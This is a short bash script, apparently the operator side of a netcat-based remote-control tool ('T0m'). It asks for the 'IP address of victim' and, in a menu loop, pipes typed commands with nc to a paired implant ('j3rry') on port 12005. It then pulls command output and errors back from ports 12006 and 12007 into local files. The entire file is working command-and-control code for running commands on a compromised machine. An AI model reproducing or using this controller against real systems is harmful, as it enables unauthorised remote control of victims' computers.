#!/bin/bash
echo "[S] T0m running"

echo -e "What is the IP address of victim?"
read -p ":" ip

outputport=12005
inputport=12006
errorport=12007
d="/home/$USER/t0m"
dir="$d/$ip"
inputfile="$dir/t0m.inp"
errorfile="$dir/t0m.err"


if [ -d "$d" ]; then
	echo "[S] $d exits."
else
	echo -n "[S] $d does not exists, creating..."
	mkdir "$d"	
	echo "Done."
fi


if [ -d "$dir" ]; then
	echo "[S] $dir exits."
else
	echo -n "[S] $dir does not exists, creating..."
	mkdir "$dir"	
	echo "Done."
fi


if [ -f "$inputfile" ]; then
	echo -n "[S] $inputfile exits, wiping..."
	echo "" > "$inputfile"
	echo "Done."
else
	echo -n "[S] $inputfile does not exists, creating..."
	touch "$inputfile"
	echo "Done."
fi


if [ -f "$errorfile" ]; then
	echo -n "[S] $errorfile exits, wiping..."
	echo "" > "$errorfile"
	echo "Done."
else
	echo -n "[S] $errorfile does not exists, creating..."
	touch "$errorfile"
	echo "Done."
fi



echo "[S] Input port: $inputport"
echo "[S] Output port: $outputport"
echo "[S] Error port: $errorport"

echo "[S] Dialog window on port: $outputport"
while :
do
	echo "[S] Options:"
	echo "[S] 	1 output a command to j3rry"
	echo "[S]	2 display previous command input from j3rry"
	echo "[S]	3 exit the program"
	read -p ":" usr
	if [ $usr -eq 3 ];then
		break
	elif [ $usr -eq 2 ]; then
		cat "$inputfile"	
		cat "$errorfile"
	elif [ $usr -eq 1 ]; then
		echo "[S] Please input the command you want to execute!"
		read -p "[S] :" command
		echo "[S] Sending $command, to $ip on $outputport"
		echo "$command" | nc "$ip" "$outputport" &
		echo "[S] Command sent!"
		sleep 2 && pkill -P $$
		nc $ip "$inputport" > "$inputfile" &
		nc $ip "$errorport" > "$errorfile" &
		sleep 2 && pkill -P $$
	else
		echo "[S] Option inputted is invalid!"
	fi
done


exit 0



